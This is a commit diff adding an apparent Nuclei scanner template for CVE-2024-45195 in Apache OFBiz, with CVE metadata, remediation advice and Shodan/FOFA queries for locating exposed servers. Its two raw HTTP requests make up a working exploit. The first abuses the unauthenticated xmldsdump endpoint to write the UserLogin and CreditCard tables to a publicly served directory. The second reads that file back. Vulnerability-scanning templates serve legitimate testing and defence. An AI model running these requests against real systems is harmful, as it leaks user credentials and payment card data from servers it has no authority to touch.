Create CVE-2024-45195.yaml
parent
4ac579d5e6
commit
cccd8037d7
|
@ -0,0 +1,61 @@
|
||||||
|
id: CVE-2024-45195
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Apache OFBiz - Unauthenticated Remote Code Execution
|
||||||
|
author: DhiyaneshDK
|
||||||
|
severity: high
|
||||||
|
description: |
|
||||||
|
Apache OFBiz below 18.12.16 is vulnerable to unauthenticated remote code execution on Linux and Windows. An attacker with no valid credentials can exploit missing view authorization checks in the web application to execute arbitrary code on the server
|
||||||
|
remediation: |
|
||||||
|
Users are recommended to upgrade to version 18.12.16, which fixes the issue.
|
||||||
|
reference:
|
||||||
|
- https://ofbiz.apache.org/download.html
|
||||||
|
- https://www.rapid7.com/blog/post/2024/09/05/cve-2024-45195-apache-ofbiz-unauthenticated-remote-code-execution-fixed/
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
|
cvss-score: 7.5
|
||||||
|
cve-id: CVE-2024-45195
|
||||||
|
cwe-id: CWE-425
|
||||||
|
epss-score: 0.00045
|
||||||
|
epss-percentile: 0.16342
|
||||||
|
cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:*
|
||||||
|
metadata:
|
||||||
|
vendor: apache
|
||||||
|
product: ofbiz
|
||||||
|
shodan-query:
|
||||||
|
- ofbiz.visitor=
|
||||||
|
- http.html:"ofbiz"
|
||||||
|
fofa-query:
|
||||||
|
- app="apache_ofbiz"
|
||||||
|
- body="ofbiz"
|
||||||
|
tags: cve,cve2024,apache,ofbiz,rce,instrusive
|
||||||
|
|
||||||
|
variables:
|
||||||
|
filename: "{{to_lower(rand_text_alpha(5))}}"
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /webtools/control/forgotPassword/xmldsdump HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
outpath=./themes/common-theme/webapp/common-theme/&maxrecords=&filename={{filename}}.txt&entityFrom_i18n=&entityFrom=&entityThru_i18n=&entityThru=&entitySyncId=&preConfiguredSetName=&entityName=UserLogin&entityName=CreditCard
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /common/{{filename}}.txt HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body_2
|
||||||
|
words:
|
||||||
|
- "<?xml version="
|
||||||
|
- "entity-engine-xml"
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: content_type_2
|
||||||
|
words:
|
||||||
|
- "text/plain"
|
Loading…
Reference in New Issue